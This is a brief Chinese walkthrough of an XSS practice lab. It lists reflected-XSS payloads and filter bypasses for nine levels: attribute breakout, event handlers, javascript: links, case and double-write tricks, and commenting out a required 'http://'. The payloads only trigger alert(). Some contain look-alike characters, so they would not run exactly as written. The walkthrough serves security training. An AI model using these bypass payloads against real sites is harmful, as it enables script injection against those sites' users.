XXS靶场
level1
<script>alert(1)</script>
level2
按照的第一关的方法插入html语句发现没用,f12后查看位置发现我们的输入在value里被闭合掉了
这种情况我们将前面的语句加 ”>给闭合掉,后面我们的输入就是一个新的执行语句。
"><script>alert(1)</script>
level3
使用前两种方法都没用,怀疑被htmlspecialchars()函数给过滤
我们查看源码后发现 <>被过滤了
使用onfocus事件
'οnfοcus=javascript:alert('xxs');'
level4
用之前的方法发现<script>alert(1)</script> <>被转义
尝试一下闭合,成功
" οnclick='alert(1)'>
level5
还是先测试<script>alert(1)</script>,然后查看源代码
发现有<>的转义,还在script中间加了下划线_,接着尝试闭合,同样存在闭合和转义,所以利用a标签的href来闭合
"><a href=javascript:alert(1)>
level6
href,onclick,<script>都被加上下划线了 ,尝试大小写绕过
"><a Href=javascript:alert(1)>
level 7
把script给删了
试试双写绕过,成功
"><scrscriptipt>alert(1)</scrscriptipt>
level 8
发现script被加下划线了,双写大小写绕过都没有用,尝试html编码绕过,成功
level9
用第八关的方法,结果提示链接不合法,给后面加一个真实的链接
源代码要求链接必须含有http://,那就把http://注释掉:/*http://*/
javascript:alert()/* http:// */